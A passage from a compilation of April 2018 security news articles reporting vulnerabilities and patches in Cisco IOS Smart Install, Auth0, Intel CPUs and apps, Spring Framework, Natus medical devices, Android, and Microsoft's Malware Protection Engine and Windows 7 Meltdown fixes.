“The patch vulnerability seems more severe to me, as people apply patches all the time (they shouldn't do it as root, but people are people),” Tony Hoyle explained in a post on the Debian bug tracker. “It's concerning that the holeybeep.ninja site exploited an unrelated fault for 'fun' without apparently telling anyone.”

Furthermore, reports of other security issues affecting Beep emerged over the weekend, along with claims that the fix is incomplete. Beep is also said to be affected by some integer overflow bugs, and a vulnerability that can be exploited to obtain information about files on a system and conduct unauthorized activities.

“I question whether beep should be saved. It would require someone carefully reviewing the code and effectively become the new upstream. And all that for a tool talking to the PC speaker, which doesn't exist in most modern systems anyway,” said German researcher and journalist Hanno Böck. “Instead distros should consider not installing it as suid or just killing the package altogether. I heard some distros (suse) replace beep with a simple ‘printf '\a’ which seems also a safe solution. (although it obviously kills all frequency/length/etc features of original ‘beep’).”


Cisco Switches in Iran, Russia Hacked in Apparent Pro-US Attack
9.4.2018 securityweek
Attack  Vulnerebility

A significant number of Cisco switches located in Iran and Russia have been hijacked in what appears to be a hacktivist campaign conducted in protest of election-related hacking. However, it’s uncertain if the attacks involve a recently disclosed vulnerability or simply abuse a method that has been known for more than a year.

Cisco devices belonging to organizations in Russia and Iran have been hijacked via their Smart Install feature. The compromised switches had their IOS image rewritten and their configuration changed to display a U.S. flag using ASCII art and the message “Don’t mess with our elections…”

The hackers, calling themselves “JHT,” told Motherboard that they wanted to send a message to government-backed hackers targeting “the United States and other countries.” They claim to have only caused damage to devices in Iran and Russia, while allegedly patching most devices found in countries such as the U.S. and U.K.

Iran’s Communication and Information Technology Ministry stated that the attack had impacted roughly 3,500 switches in the country, but said a vast majority were quickly restored.

Cisco switch hacked via Smart Install

Kaspersky Lab reported that the attack appeared to mostly target the “Russian-speaking segment of the Internet.”

While there are some reports that the attack involves a recently patched remote code execution vulnerability in Cisco’s IOS operating system (CVE-2018-0171), that might not necessarily be the case.

The Cisco Smart Install Client is a legacy utility that allows no-touch installation of new Cisco switches. Roughly one year ago, the company warned customers about misuse of the Smart Install protocol following a spike in Internet scans attempting to detect unprotected devices that had this feature enabled.

Attacks, including ones launched by nation-state threat actors such as the Russia-linked Dragonfly, abused the fact that many organizations had failed to securely configure their switches, rather than an actual vulnerability.

Cisco issued a new warning last week as the disclosure of CVE-2018-0171 increases the risk of attacks, but the networking giant said it had not actually seen any attempts to exploit this vulnerability in the wild. Cisco’s advisory for this flaw still says there is no evidence of malicious exploitation.

There are hundreds of thousands of Cisco switches that can be hijacked by abusing the Smart Install protocol, and Cisco Talos experts believe attackers are unlikely to bother using CVE-2018-0171.

Cisco expert on CVE-2018-0171 exploitation

The Network Security Research Lab at Chinese security firm Qihoo 360 says the data from its honeypot shows that the attacks have “nothing to do with CVE-2018-0171” and instead rely on a publicly available Smart Install exploitation tool released several months ago.

While none of the major players in the infosec industry have confirmed that the attacks on Iran and Russia rely on CVE-2018-0171, technical details and proof-of-concept (PoC) code have been made available by researchers, making it easier for hackers to exploit.

Hamed Khoramyar, founder of Sweden-based ICT firm Aivivid, said the attacks exploited CVE-2018-0171. Kudelski Security also reported seeing attacks involving both CVE-2018-0171 and another recently disclosed IOS vulnerability tracked as CVE-2018-0156. However, Kudelski’s blog post also lists Khoramyar as one of its sources.


Auth0 authentication bypass issue exposed enterprises to hack
9.4.2018 securityaffairs
Vulnerebility

Auth0, one of the biggest identity-as-a-service platform is affected by a critical authentication bypass vulnerability that exposed enterprises to hack.
Auth0, one of the biggest identity-as-a-service platform is affected by a critical authentication bypass vulnerability that could be exploited by attackers to access any portal or application which are using it for authentication.

Auth0 implements a token-based authentication model for a large number of platforms, it managed 42 million logins every day and billions of login per month for over 2000 enterprise customers.

Auth0

In September 2017, researchers from security firm Cinta Infinita discovered a flaw in Auth0’s Legacy Lock API while they were pentesting an unnamed application that used service for the authentication.

The vulnerability tracked as CVE-2018-6873 it related to improper validation of the JSON Web Tokens (JWT) audience parameter.

The experts exploited this issue to bypass login authentication using a cross-site request forgery (CSRF/XSRF) attack triggering the CVE-2018-6874 flaw against applications implementing Auth0 authentication.

The experts exploited the CSRF vulnerability to reuse a valid signed JWT generated for a separate account to access the targeted victim’s account.

The unique information needed by attackers is the victim’s user ID or email address, that could be easily obtained with social engineering attacks.

“So, now we had the ability to forge a valid signed JWT with the “email” and “user_id” of the victim.” reads the analysis of the experts.

“It worked!! Why? The audience claim was not being checked and JWTs generated from our test application were accepted by the Management Console app (same signing key / private certificate).”

Below a video PoC of the attack to demonstrate how to obtain the victim’s user id and bypass password authentication when logging into Auth0’s Management Dashboard by forging an authentication token.

The researchers explained that it is possible to use this attack against many organizations.

“Could we use this attack to access arbitrary applications? Yes, as long as we know the expected fields and values for the JWT. There is no need of social engineering in most of the cases we saw. Authentication for applications that use an email address or an incremental integer for user identification would be trivially bypassed.” continues the analysis.

Security firm Cinta Infinita reported the vulnerability to the company in October 2017 and Auth0 solved the issue in a few hours but it spent several months to reach each customers using the vulnerable SDK and supported libraries of Auth0.

“We waited for six months before publicly disclosing this issue so that Auth0could update all their Private SaaS Appliances (on-premise) as well.” continues the analysis.

“Auth0 published a blog post about their internal vulnerability management and remediation process where they mention our finding and the assistance we provided: https://auth0.com/blog/managing-and-mitigating-security-vulnerabilities-at-auth0/“


Critical flaw leaves thousands of Cisco Switches vulnerable to remote hacking
8.4.2018 thehackernews
Vulnerebility

Security researchers at Embedi have disclosed a critical vulnerability in Cisco IOS Software and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to execute arbitrary code, take full control over the vulnerable network equipment and intercept traffic.
The stack-based buffer overflow vulnerability (CVE-2018-0171) resides due to improper validation of packet data in Smart Install Client, a plug-and-play configuration and image-management feature that helps administrators to deploy (client) network switches easily.


Embedi has published technical details and Proof-of-Concept (PoC) code after Cisco today released patch updates to address this remote code execution vulnerability, which has been given a base Common Vulnerability Scoring System (CVSS) score of 9.8 (critical).
Researchers found a total of 8.5 million devices with the vulnerable port open on the Internet, leaving approximately 250,000 unpatched devices open to hackers.
To exploit this vulnerability, an attacker needs to send a crafted Smart Install message to an affected device on TCP port 4786, which is opened by default.
"To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg" and "because the size of the data copied to a fixed-size buffer is not checked, the size and data are taken directly from the network packet and are controlled by an attacker," Cisco explain in its advisory.
The vulnerability can also result in a denial-of-service condition (watchdog crash) by triggering indefinite loop on the affected devices.


Researchers demonstrated the vulnerability at a conference in Hong Kong after reporting it to Cisco in May 2017.
Video Demonstrations of the Attack:
In their first demonstration, as shown in the video below, researchers targeted Cisco Catalyst 2960 switch to reset/change the password and entered privileged EXEC mode:

 

In their second demo, researchers exploited the flaw to successfully intercept the traffic between other devices connected to the vulnerable switch and the Internet.

Affected Hardware and Software:
The vulnerability was tested on Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches devices, as well as all devices that fall into the Smart Install Client type are potentially vulnerable, including:
Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
Cisco fixed the vulnerability in all of its affected products on 28th March 2018, and Embedi published a blog post detailing the vulnerability on 29th March. So, administrators are highly recommended to install free software updates to address the issue as soon as possible.


Intel Admits It Won't Be Possible to Fix Spectre (V2) Flaw in Some Processors

8.4.2018 thehackernews Vulnerebility

As speculated by the researcher who disclosed Meltdown and Spectre flaws in Intel processors, some of the Intel processors will not receive patches for the Spectre (variant 2) side-channel analysis attack
In a recent microcode revision guidance (PDF), Intel admits that it would not be possible to address the Spectre design flaw in its specific old CPUs, because it requires changes to the processor architecture to mitigate the issue fully.
The chip-maker has marked "Stopped" to the production status for a total 9 product families—Bloomfield, Clarksfield, Gulftown, Harpertown Xeon, Jasper Forest, Penryn, SoFIA 3GR, Wolfdale, and Yorkfield.
These vulnerable chip families—which are mostly old that went on sale between 2007 and 2011—will no longer receive microcode updates, leaving more than 230 Intel processor models vulnerable to hackers that powers millions of computers and mobile devices.
According to the revised guidance, "after a comprehensive investigation of the microarchitectures and microcode capabilities for these products, Intel has determined to not release microcode updates for these products for one or more reasons."
Intel mentions three reasons in its documentation for not addressing the flaw in some of the impacted products:
Micro-architectural characteristics that preclude a practical implementation of features mitigating Variant 2 (CVE-2017-5715)
Limited Commercially Available System Software support
Based on customer inputs, most of these products are implemented as "closed systems" and therefore are expected to have a lower likelihood of exposure to these vulnerabilities.
Spectre variant 2 vulnerability (CVE-2017-5715) affects systems wherein microprocessors utilize speculative execution and indirect branch prediction, allowing a malicious program to read sensitive information, such as passwords, encryption keys, or sensitive information, including that of the kernel, using a side-channel analysis attack.
However, these processors can install pre-mitigation production microcode updates to mitigate Variant 1 (Spectre) and Variant 3 (Meltdown) flaws.
"We've now completed release of microcode updates for Intel microprocessor products launched in the last 9+ years that required protection against the side-channel vulnerabilities discovered by Google. However, as indicated in our latest microcode revision guidance, we will not be providing updated microcode for a select number of older platforms for several reasons, including limited ecosystem support and customer feedback." says an Intel spokesperson via email.
Besides Intel, AMD Ryzen and EPYC processors were also found vulnerable to 13 critical vulnerabilities that could allow an unauthorized attacker to access sensitive data, install persistent malware inside the chip, and gain full access to the compromised systems.
AMD has acknowledged reported vulnerabilities and promised to roll out firmware patches for millions of affected devices in the coming weeks.
However, CTS Labs, the security firm that discovered and disclosed the vulnerabilities, claimed that AMD could take several months to release patches for most of the security issues, where some of them cannot be fixed.


Critical Flaws Expose Natus Medical Devices to Remote Attacks
7.4.2018 securityweek 
Vulnerebility

Researchers at Cisco Talos have identified several critical vulnerabilities that expose Natus medical devices to remote hacker attacks. The vendor has released firmware updates that patch the flaws.

The vulnerabilities allow remote code execution and denial-of-service (DoS) attacks and they impact the Natus NeuroWorks software, which is used by the company’s Xltek electroencephalography (EEG) equipment to monitor and review data over the network.

According to Cisco, an attacker with access to the targeted network can remotely execute arbitrary code on the device or cause a service to crash by sending specially crafted packets. An attack does not require authentication.

“Vulnerable systems are searched for by attackers as points of ingress and persistence within computer networks. A vulnerable system can be compromised by threat actors, used to conduct reconnaissance on the network, and as a platform from which further attacks can be launched,” Talos warned.

Remote code execution on vulnerable Natus devices is possible due to four different functions that can cause a buffer overflow. All of the code execution flaws have been rated “critical” with CVSS scores of 9 or 10. The DoS vulnerability, rated “high severity,” is caused by an out-of-bounds read issue.

Cisco said it reported the vulnerabilities to Natus in July 2017, but the bugs were only confirmed in October. The flaws have been tested on Natus Xltek NeuroWorks 8 and they have been patched with the release of NeuroWorks 8.5 GMA2.

Healthcare facilities that use the affected products have been advised to install the update as soon as possible. The risk of attacks involving these vulnerabilities is relatively high considering that the devices are widely deployed – Natus was recently reported to have a 60 percent share in the global neurodiagnostic market. Furthermore, Cisco has made available technical information for each of the vulnerabilities.

The healthcare industry has been increasingly targeted by malicious actors, including in attacks involving ransomware and theft of sensitive information. The infosec community and authorities have issued numerous warnings, and recent reports show that there are plenty of healthcare product vulnerabilities that hackers could exploit in their operations.


A Remote Code Execution Vulnerability found in the Spring Framework. Upgrade it now!
7.4.2018 securityaffairs
Vulnerebility

Security experts have discovered a vulnerability in the Spring Framework that could be exploited by a remote attacker to execute arbitrary code on applications built with it.
Security researchers have discovered three vulnerabilities in the Spring Development Framework, one of them could be exploited by a remote attacker to execute arbitrary code on applications built with it.

Pivotal’s Spring is widely used open source framework for the development of web applications. Affected Spring Framework versions are 5.0 to 5.0.4, 4.3 to 4.3.14, and older versions.

The security advisory published by Pivotal includes technical details of the following three vulnerabilities;

CVE-2018-1270: Remote Code Execution with spring-messaging, it is rated as “Critical”.
“Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the
spring-messaging
module.” reads the advisory.

An attacker can send specially crafted messages to the broker in order to trigger the remote code execution flaw.

CVE-2018-1271: Directory Traversal with Spring MVC on Windows, it is rated as “High”.
“Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images).” reads the advisory.

An attacker can use a specially crafted URL to lead a directory traversal attack.

CVE-2018-1272: Multipart Content Pollution with Spring Framework, it is rated as “Low”.
“When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.” reads the advisory.

An attacker that is able to guess the multipart boundary value chosen by server A for the multipart request to server B could successfully exploit the issue. This means that the attacker needs to gain the control of the server or have to find a way to see the HTTP log of server A through a separate attack vector.

Pivotal's Spring framework Data REST

The above issued are addressed with the Spring Framework 5.0.5 and 4.3.15. Pivotal also released Spring Boot 2.0.1 and 1.5.11.0.

Development teams need to upgrade their software to the latest versions as soon as possible.


Intel Discontinues Keyboard App Affected by Critical Flaws
6.4.2018 securityweek 
Vulnerebility

Serious vulnerabilities have been found in Intel’s Remote Keyboard application, but the company will not release any patches and instead advised users to uninstall the app.

Introduced in June 2015, the Intel Remote Keyboard apps for Android and iOS allow users to wirelessly control their Intel NUC and Compute Stick devices from a smartphone or tablet. The Android application has been installed more than 500,000 times.

Researchers discovered recently that all versions of Intel Remote Keyboard are affected by three severe privilege escalation flaws.

The most serious of them, rated “critical” and identified as CVE-2018-3641, allows a network attacker to inject keystrokes as a local user. The vulnerability was reported to Intel by a UK-based researcher who uses the online moniker trotmaster.

Another vulnerability, tracked as CVE-2018-3645 and rated “high severity,” was reported to Intel by Mark Barnes. The researcher discovered that Intel Remote Keyboard is affected by a privilege escalation flaw that allows a local attacker to inject keystrokes into another keyboard session.

The third security hole is CVE-2018-3638, which allows an authenticated, local attacker to execute arbitrary code with elevated privileges. Intel has credited Marius Gabriel Mihai for finding this vulnerability.

Intel does not plan on releasing patches for these vulnerabilities. The company has decided to discontinue the product and advised users to uninstall the apps at their earliest convenience. Intel Remote Keyboard has been removed from both Google Play and the Apple App Store.

Intel also published a security advisory this week to warn customers of an important denial-of-service (DoS) vulnerability affecting the SPI Flash component in multiple processors. The flaw was discovered by Intel itself and mitigations are available.

The company also informed users of a privilege escalation flaw in 2G modems, including XMM71xx, XMM72xx, XMM73xx, XMM74xx, Sofia 3G, Sofia 3G-R, and Sofia 3G-RW. The issue impacts devices that have the Earthquake Tsunami Warning System (ETWS) feature enabled.

A network attacker can exploit the vulnerability to execute arbitrary code. “Devices equipped with an affected modem, when connected to a rogue 2G base station where non-compliant 3GPP software may be operational, are potentially at risk,” Intel said.

The company says it has developed patches for this vulnerability.

“External researchers reported a potential security vulnerability in the implementation of the Earthquake and Tsunami Warning System (ETWS) in certain Intel 2G modem firmware implementations. Intel has developed firmware updates that address the issue, and we have been working closely with our customers and partners to deploy the updates to affected products as soon as possible,” Intel told SecurityWeek in an emailed statement.


Intel Will Not Patch Spectre in Some CPUs
5.4.2018 securityweek
Vulnerebility

Intel has informed customers that some of the processors affected by the Meltdown and Spectre vulnerabilities will not receive microcode updates due to issues related to implementation and other factors.

Two weeks after announcing that microcode updates have been made available for all recent processors vulnerable to speculative execution side-channel attacks, Intel updated its microcode revision guidance to say that some chips will not receive patches.

The list includes Core, Xeon, Celeron, Pentium, and Atom processors with Bloomfield (Xeon), Clarksfield, Gulftown, Harpertown Xeon, Jasper Forest, Penryn/QC, SoFIA 3GR, Wolfdale (Xeon) and Yorkfield (Xeon) microarchitectures. These products have been assigned a “stopped” status, which indicates they will not receive updates due to one or more reasons.

Intel says it has conducted a comprehensive investigation of the microarchitecture and microcode capabilities of these CPUs and determined that some of their characteristics prevent a practical implementation of mitigations for Spectre Variant 2 (CVE-2017-5715).

Other possible reasons for not releasing fixes include limited commercially available system software support and low risk of attacks.

“Based on customer inputs, most of these products are implemented as ‘closed systems’ and therefore are expected to have a lower likelihood of exposure to these vulnerabilities,” Intel explained.

Intel revealed recently that its upcoming processors for data centers and PCs will include built-in protections against Meltdown (Variant 3) and Spectre (Variant 2) attacks. The chip giant expects to roll out these protections in the second half of 2018.

“We have redesigned parts of the processor to introduce new levels of protection through partitioning that will protect against both Variants 2 and 3,” explained Intel CEO Brian Krzanich. “Think of this partitioning as additional ‘protective walls’ between applications and user privilege levels to create an obstacle for bad actors.”

Dozens of lawsuits have been filed against Intel by customers and shareholders over the disclosure and handling of Meltdown and Spectre.


Google Patches 9 Critical Android Vulnerabilities in April 2018 Update
5.4.2018 securityweek
Vulnerebility  Android

Google this week has released its April 2018 set of Android security patches which address more than two dozen Critical and High severity vulnerabilities.

19 vulnerabilities were found to affect components such as Android runtime, Framework, Media framework, and System. These include 7 issues rated Critical and 12 considered High risk. All of the flaws were patched as part of the 2018-04-01 security patch level.

Successful exploitation of these security bugs could result in elevation of privileges, information disclosure, remote code execution, and denial of service.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in its advisory.

Six of the Critical severity bugs were remote code execution vulnerabilities, while the seventh was an elevation of privilege flaw. Impacted platform versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

Google also addressed 9 vulnerabilities as part of the 2018-04-05 security patch level, namely 2 Critical and 7 High severity. The issues impact Broadcom, Kernel, and Qualcomm components.

Both Critical bugs are remote code execution flaws, while the High severity issues include elevation of privilege and information disclosure vulnerabilities.

“The most severe vulnerability in this section could enable a proximate attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes.

The 2018-04-05 security patch level also includes patches for 34 vulnerabilities in Qualcomm closed-source components: 6 rated Critical and 28 assessed with a High risk severity level.

Google also included a Qualcomm closed-source components 2014-2016 cumulative update as part of its April 2018 Android security bulletin, although many devices have already addressed these issues in previous updates.

“These vulnerabilities affect Qualcomm components and were shared by Qualcomm with their partners through Qualcomm AMSS security bulletins or security alerts between 2014 and 2016. They are included in this Android security bulletin in order to associate them with a security patch level,” Google explains.

Over 250 vulnerabilities were included in the cumulative update, most rated High severity. One of the bugs was rated Critical risk and 9 were rated Moderate severity.

This month, Google also addressed over 40 vulnerabilities in the Nexus and Pixel devices, all rated Moderate severity (four of the flaws have a High severity rating on Android 6.0 and 6.0.1 devices). Impacted components include Framework, Media framework, System, and Broadcom, Kernel, and Qualcomm components.

On top of these security fixes, the Internet giant also included over 70 functional updates for Google devices as part of the April 2018 Pixel / Nexus Security Bulletin.


Critical Vulnerability Patched in Microsoft Malware Protection Engine
5.4.2018 securityweek
Vulnerebility

An update released this week by Microsoft for its Malware Protection Engine patches a vulnerability that can be exploited to take control of a system by placing a malicious file in a location where it would be scanned.

The Microsoft Malware Protection Engine provides scanning, detection and cleaning capabilities for security software made by the company. The engine is affected by a flaw that can be exploited for remote code execution when a specially crafted file is scanned.

The malicious file can be delivered via a website, email or instant messenger. The Malware Protection Engine will automatically scan the file (if real-time protection is enabled) and allow the attacker to execute arbitrary code in the context of the LocalSystem account, which can lead to a complete takeover of the targeted system.

On systems where real-time scanning is not enabled, the exploit will still get triggered, but only when a scheduled scan is initiated.

The vulnerability, tracked as CVE-2018-0986 and rated “critical,” affects several Microsoft products that use the Malware Protection Engine, including Exchange Server, Forefront Endpoint Protection 2010, Security Essentials, Windows Defender, and Windows Intune Endpoint Protection.

While the flaw is dangerous and easy to exploit, Microsoft believes exploitation is “less likely.” The company pointed out that the patch for this vulnerability will be automatically delivered to customers within 48 hours of release – users and administrators do not have to take any action.

Google Project Zero researcher Thomas Dullien, aka “Halvar Flake,” has been credited for finding CVE-2018-0986. The details of the vulnerability have yet to be disclosed, but considering that the patch is being delivered automatically to most systems, the information will likely become available soon.

This is not the first time Google Project Zero researchers have discovered critical vulnerabilities in Microsoft’s Malware Protection Engine. While Google may occasionally disclose flaws in Microsoft products before patches become available, in the case of the Malware Protection Engine, Microsoft typically releases patches within a few days or weeks.

A similar flaw in the Malware Protection Engine was also found recently by employees of UK's National Cyber Security Centre (NCSC).


Microsoft issued out-of-band patch to fix CVE-2018-0986 Malware Protection Engine flaw

5.4.2018 securityaffairs Vulnerebility

On April 3, Microsoft Out-Of-Band Security Update to address the CVE-2018-0986 vulnerability affecting the Microsoft Malware Protection Engine (MMPE).
Microsoft Malware Protection Engine is the core component for malware detection and cleaning of several Microsoft anti-malware software. It is currently implemented in Windows Defender, Microsoft Security Essentials, Microsoft Endpoint Protection, Windows Intune Endpoint Protection, and Microsoft Forefront Endpoint Protection.

The CVE-2018-0986 flaw could be exploited by attackers to execute malicious code on a Windows system with system privileges to gain the full control of the vulnerable machine.

The CVE-2018-0986 vulnerability rated as ‘critical’ was discovered by Thomas Dullien, white hat hacker at the Google Project Zero.

“A remote code execution vulnerability exists when the Microsoft Malware Protection Engine does not properly scan a specially crafted file, leading to memory corruption. An attacker who successfully exploited this vulnerability could execute arbitrary code in the security context of the LocalSystem account and take control of the system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.“reads the security advisory published by Microsoft.

“To exploit this vulnerability, a specially crafted file must be scanned by an affected version of the Microsoft Malware Protection Engine,”

According to the experts, it is quite easy to exploit the flaw, an attacker can deploy the malicious code inside JavaScript files hosted on the website then it needs to trick the victim into visiting it. Another attack scenario sees the hackers send the malicious code as attachment of an email sent to the victim, or via an instant messaging client.

The attack doesn’t need user interaction because the Microsoft Malware Protection Engine automatically scans all incoming files.

Experts pointed out that Windows Defender is enabled by default on Windows 10.

Microsoft has addressed the flaw in MMPE version 1.1.14700.5, the security patch is going to be delivered without needing user interaction.

CVE-2018-0986

“For affected software, verify that the Microsoft Malware Protection Engine version is 1.1.14700.5 or later.

If necessary, install the update Administrators of enterprise antimalware deployments should ensure that their update management software is configured to automatically approve and distribute engine updates and new malware definitions. Enterprise administrators should also verify that the latest version of the Microsoft Malware Protection Engine and definition updates are being actively downloaded, approved and deployed in their environment.” states Microsoft.

“For end-users, the affected software provides built-in mechanisms for the automatic detection and deployment of this update. For these customers, the update will be applied within 48 hours of its availability. The exact time frame depends on the software used, Internet connection, and infrastructure configuration.”


Microsoft's Meltdown Patch Made Windows 7 PCs More Insecure
1.4.2018 thehackernews
Vulnerebility

Meltdown CPU vulnerability was bad, and Microsoft somehow made the flaw even worse on its Windows 7, allowing any unprivileged, user-level application to read content from and even write data to the operating system's kernel memory.
For those unaware, Spectre and Meltdown were security flaws disclosed by researchers earlier this year in processors from Intel, ARM, and AMD, leaving nearly every PC, server, and mobile phone on the planet vulnerable to data theft.
Shortly after the researchers disclosed the Spectre and Meltdown exploits, software vendors, including Microsoft, started releasing patches for their systems running a vulnerable version of processors.
However, an independent Swedish security researcher Ulf Frisk found that Microsoft's security fixes to Windows 7 PCs for the Meltdown flaw—which could allow attackers to read kernel memory at a speed of 120 KBps—is now allowing attackers to read the same kernel memory at a speed of Gbps, making the issue even worse on Windows 7 PCs and Server 2008 R2 boxes.
Frisk is the same researcher who previously discovered a way to steal the password from virtually any Mac laptop in just 30 sec by exploiting flaws in Apple's FileVault disk encryption system, allowing attackers to unlock any Mac system and even decrypt files on its hard drive.
The discovery is the latest issue surrounding Meltdown and Spectre patches that were sometimes found incomplete and sometimes broken, making problems such as spontaneous reboots and other 'unpredictable' system behavior on affected PCs.
According to Frisk, the problem with MS' early Meltdown fixes occurs due to a single bit (that controls the permission to access kernel memory) accidentally being flipped from supervisor-only to any-user in a virtual-to-physical-memory translator called PLM4, allowing any user-mode application to access the kernel page tables.
The PML4 is the base of the 4-level in-memory page table hierarchy that Intel's CPU Memory Management Unit (MMU) uses to translate the virtual memory addresses of a process into physical memory addresses in RAM.
The correctly set bit normally ensures the kernel has exclusive access to these tables.
"The User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself," Frisk explains in his blog post.
To prove his claim, Frisk also provided a detailed breakdown and a proof-of-concept exploit. The issue only affects 64-bit versions of Windows 7 and Windows Server 2008 R2, and not Windows 10 or Windows 8.1 PCs, as they still require attackers to have physical access to a targeted system.
Buggy Patch Allows to Read Gigabytes of Data In a Second
Also since the PML4 page table has been located at a fixed memory address in Windows 7, "no fancy exploits" are needed to exploit the Meltdown vulnerability.
"Windows 7 already did the hard work of mapping in the required memory into every running process," Frisk said. "Exploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write!"
Once read/write access has been gained to the page tables, it would be "trivially easy" to gain access to the entire physical memory, "unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization," Frisk said.
All attackers have to do is to write their own Page Table Entries (PTEs) into the page tables in order to access arbitrary physical memory.
Frisk said he has not been able to link the new vulnerability to anything on the public list of Common Vulnerabilities and Exposures. He also invited researchers to test the flaw using an exploit kit he released on GitHub.
UPDATE: Microsoft Releases Emergency Patch
In the wake of the researcher's finding, Microsoft released an emergency patch on Thursday for the vulnerability (CVE-2018-1038) introduced as a Meltdown patch issued by the company earlier this year.
The out-of-band security update for Microsoft Windows 7 and Windows Server 2008 R2 "addresses an elevation of privilege vulnerability in the Windows kernel in the 64-Bit (x64) version of Windows."
According to the Microsoft advisory, the elevation of privilege flaw occurs when the Windows kernel fails to handle objects in memory properly. Successfully exploitation of this flaw could allow an attacker to run arbitrary code in kernel mode.
"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," the advisory states.
No other Windows OS version is impacted, except Windows 7 Service Pack 1 (x64) and Windows Server 2008 R2 Service Pack 1 (x64).
So all admins and users of Windows 7 and Windows 2008R2 are strongly recommended to update their systems as soon as possible.


Critical Flaw Exposes Many Cisco Devices to Remote Attacks
30.3.2018 securityweek 
Vulnerebility

Cisco has patched more than 30 vulnerabilities in its IOS software, including a critical remote code execution flaw that exposes hundreds of thousands – possibly millions – of devices to remote attacks launched over the Internet.

A total of three vulnerabilities have been rated critical. One of them is CVE-2018-0171, an issue discovered by researchers at Embedi in the Smart Install feature in IOS and IOS XE software.

An unauthenticated attacker can send specially crafted Smart Install messages to an affected device on TCP port 4786 and cause it to enter a denial-of-service (DoS) condition or execute arbitrary code.

Cisco pointed out that Smart Install is enabled by default on switches that have not received a recent update for automatically disabling the feature when it’s not in use.

Embedi has published a blog post detailing CVE-2018-0171 and how it can be exploited. Researchers initially believed the vulnerability could only be exploited by an attacker inside the targeted organization’s network. However, an Internet scan revealed that there are roughly 250,000 vulnerable Cisco devices that have TCP port 4786 open.

Furthermore, Embedi told SecurityWeek that it has identified approximately 8.5 million devices that use this port, but researchers have not been able to determine if the Smart Install technology is present on these systems.

Another IOS vulnerability patched by Cisco and rated critical is CVE-2018-0150, a backdoor that allows an attacker to remotely access a device. This security hole is introduced by the existence of an undocumented account with a default username and password. The credentials provide access to a device with privilege level 15, the highest level of access for Cisco network devices.

The last critical security hole is CVE-2018-0151, which affects the quality of service (QoS) subsystem of IOS and IOS XE software. The flaw can allow a remote an unauthenticated attacker to cause a DoS condition or execute code with elevated privileges by sending malicious packets to a device.

The networking giant has patched a total of 17 high severity flaws in IOS and IOS XE software. The list includes mostly DoS issues, but some of the vulnerabilities can be exploited for remote code execution and privilege escalation.

Cisco also patched over a dozen IOS vulnerabilities rated “medium severity.” A majority of the bugs were discovered by the company itself and there is no evidence that any of them have been exploited for malicious purposes.


Microsoft Fixes Windows Flaw Introduced by Meltdown Patches
30.3.2018 securityweek 
Vulnerebility

Microsoft has released out-of-band updates for Windows 7 and Windows Server 2008 R2 to address a serious privilege escalation vulnerability introduced earlier this year by the Meltdown mitigations.

Researcher Ulf Frisk reported this week that the patches released by Microsoft in January and February for the Meltdown vulnerability created an even bigger security hole that allows an attacker to read from and write to memory at significant speeds.

Frisk disclosed details of the bug since Microsoft’s security updates for March appeared to have addressed the issue. However, an investigation conducted by the tech giant revealed that the flaw had not been properly fixed.

Microsoft informed customers on Thursday that a new patch has been released for Windows 7 x64 Service Pack 1 and Windows Server 2008 R2 x64 Service Pack 1 to fully resolve the problem. “Customers who apply the updates, or have automatic updates enabled, are protected.” a Microsoft spokesperson said.

The vulnerability, tracked as CVE-2018-1038 and rated “important,” has been patched with the KB4100480 update. Users are advised to install the update as soon as possible, particularly since some Microsoft employees believe it will likely be exploited in the wild soon.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,” Microsoft said in an advisory.

Frisk explained in a blog post that while the Meltdown vulnerability allows an attacker to read megabytes of data per second, the new flaw can be exploited to read gigabytes of data per second. In one of the tests he conducted, the researcher managed to access the memory at speeds of over 4 Gbps. The security hole can also be exploited to write to memory.

Exploiting the flaw is easy once the attacker has gained access to the targeted system. A direct memory access (DMA) attack tool developed by Frisk can be used to reproduce the vulnerability.


CISCO addresses two critical remote code execution flaws in IOS XE operating system
30.3.2018 securityaffairs
Vulnerebility

This week Cisco patched three critical vulnerabilities affecting its operating system IOS XE, two of them are remote code execution flaws that could be exploited by an attacker to gain full control over vulnerable systems.
Cisco March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication addressed 22 vulnerabilities, 3 of them rated as critical and 19 as high.

Let’s give a close look at the critical vulnerabilities.

The first issue. tracked as CVE-2018-0151, is an IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability.

“A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.” reads the advisory published by Cisco.

